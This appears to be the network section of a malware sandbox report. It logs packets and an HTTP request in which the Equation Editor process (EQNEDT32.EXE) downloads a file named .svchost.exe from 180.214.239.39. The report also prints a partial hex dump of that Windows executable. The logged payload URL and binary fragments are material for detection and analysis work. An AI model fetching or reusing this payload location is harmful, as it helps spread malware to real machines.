Jul 21, 2021 08:30:42.374624014 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.374640942 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.374656916 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.374660015 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.374672890 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.374672890 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.374692917 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.374701023 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.374711990 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.374727964 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.374742031 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.374743938 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.374756098 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.374762058 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.374769926 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.374778032 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.374794006 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.374794960 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.374809980 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.374810934 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.374826908 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.374844074 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.374901056 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.374941111 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.377527952 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.656745911 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.656780958 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.656804085 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.656827927 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.656876087 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.656907082 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.656910896 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.656975031 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.657000065 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.657035112 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.657047987 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.657139063 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.657177925 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.657294989 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.657331944 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.660876989 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.660897970 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.660916090 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.660931110 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.660933018 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.660948038 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.660953045 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.660958052 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.660962105 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.660964966 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.660981894 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.660989046 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.661000013 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.661017895 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.661026001 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.661032915 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.661047935 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.661056042 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.661061049 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.661062956 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.661063910 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.661078930 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.661091089 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.661094904 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.661098957 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.661109924 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.661115885 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.661128998 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.661132097 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.661159039 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.661331892 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.661582947 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.661600113 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.661617994 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.661634922 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.661638021 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.661648035 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.661649942 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.661665916 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.661670923 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.661683083 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.661684990 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.661698103 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.661701918 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.661712885 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.661727905 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.661746979 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.661753893 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.661757946 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.661760092 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.661761999 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.661762953 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.661778927 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.661778927 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.661793947 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.661809921 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.661825895 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.661830902 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.661835909 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.661843061 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.661859035 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.661853075 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.661865950 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.661878109 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.661879063 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.661880970 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.661894083 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.661896944 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.661910057 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.661912918 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.661925077 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.661931038 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.661946058 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.661957979 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.661959887 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.661973000 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.662056923 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.662333965 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.963835955 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.963865995 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.963882923 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.963907003 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.963931084 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.963951111 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.963973045 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.963995934 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.964134932 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.969110012 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.969141006 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.969162941 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.969198942 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.969222069 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.969243050 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.969264030 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.969312906 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.969340086 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.970896006 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.970922947 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.970946074 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.970969915 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.970992088 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.971008062 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.971014023 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.971023083 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.971036911 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.971059084 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.971079111 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.971100092 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.971138954 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.971160889 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.971163988 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.971169949 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.971174002 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.971175909 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.971185923 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.971203089 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.971206903 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.971210957 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.971229076 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.971241951 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.971250057 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.971252918 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.971271992 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.971283913 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.971293926 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.971303940 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.971316099 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.971323967 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.971340895 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.971362114 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.971364021 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.971378088 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.971379042 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.971386909 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.971400023 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.971410990 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.971419096 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.971429110 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.971436977 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.971450090 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.971457005 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.971471071 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.971478939 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.971488953 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.971503019 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.971509933 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.971524000 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.971538067 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.971543074 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.971550941 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.971565008 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.971575975 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.971585989 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.971596956 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.971607924 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.971625090 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.971637964 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.972296953 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:43.290153980 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:43.290193081 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:43.290219069 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:43.290242910 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:43.290266991 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:43.290292025 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:43.290312052 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:43.290337086 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:43.290365934 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:43.290390015 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:43.290411949 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:43.290431976 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:43.290510893 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:43.290535927 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:43.290539980 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:43.290543079 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:43.290544987 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:43.290551901 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:43.295914888 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:43.295958042 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:43.295984030 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:43.296006918 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:43.296027899 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:43.296041012 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:43.296051025 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:43.296061993 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:43.296066046 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:43.296076059 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:43.296101093 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:43.296108961 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:43.296123981 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:43.296147108 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:43.296147108 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:43.296156883 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:43.296169043 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:43.296169996 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:43.296190977 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:43.296199083 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:43.296207905 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:43.296215057 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:43.296224117 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:43.296237946 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:43.296252966 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:43.296391964 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:43.298270941 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:43.298300028 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:43.298321009 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:43.298453093 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:43.298472881 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:43.858208895 CEST	49165	80	192.168.2.22	180.214.239.39

HTTP Request Dependency Graph

180.214.239.39

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	180.214.239.39	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Jul 21, 2021 08:30:41.121226072 CEST	0	OUT	GET /service/.svchost.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 180.214.239.39 Connection: Keep-Alive
Jul 21, 2021 08:30:41.422100067 CEST	1	IN	HTTP/1.1 200 OK Date: Wed, 21 Jul 2021 06:30:40 GMT Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28 Last-Modified: Tue, 20 Jul 2021 21:04:05 GMT ETag: "3c468-5c79464e23873" Accept-Ranges: bytes Content-Length: 246888 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c7 bf 79 da 83 de 17 89 83 de 17 89 83 de 17 89 00 c2 19 89 82 de 17 89 cc fc 1e 89 87 de 17 89 b5 f8 1a 89 82 de 17 89 52 69 63 68 83 de 17 89 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 1c e1 51 55 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 30 03 00 00 70 00 00 00 00 00 00 30 13 00 00 00 10 00 00 00 40 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 07 00 00 00 04 00 00 00 00 00 00 00 00 b0 03 00 00 10 00 00 62 71 04 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 03 00 28 00 00 00 00 50 03 00 b4 54 00 00 00 00 00 00 00 00 00 00 50 b0 03 00 18 14 00 00 00 00 00 00 00 00 00 00 00 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 24 03 00 00 10 00 00 00 30 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 90 0b 00 00 00 40 03 00 00 10 00 00 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b4 54 00 00 00 50 03 00 00 60 00 00 00 50 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$yRichPELQU0p0@@bqT0(PTP( .text$0 `.data@@@.rsrcTP`P@@IMSVBVM60.DLL
Jul 21, 2021 08:30:41.422137022 CEST	3	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jul 21, 2021 08:30:41.422158003 CEST	4	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jul 21, 2021 08:30:41.422182083 CEST	5	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jul 21, 2021 08:30:41.746315002 CEST	7	IN	Data Raw: 4f ad 33 99 66 cf 11 b7 0c 00 aa 00 60 d3 93 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 db 02 00 79 4f 00 00 00 08 00 64 6f 74 69 6e 67 73 63 00 0d 01 04 00 52 49 47 48 00 19 01 Data Ascii: O3f`yOdotingscRIGHB"#6Olt.O00h (00 f$h.+
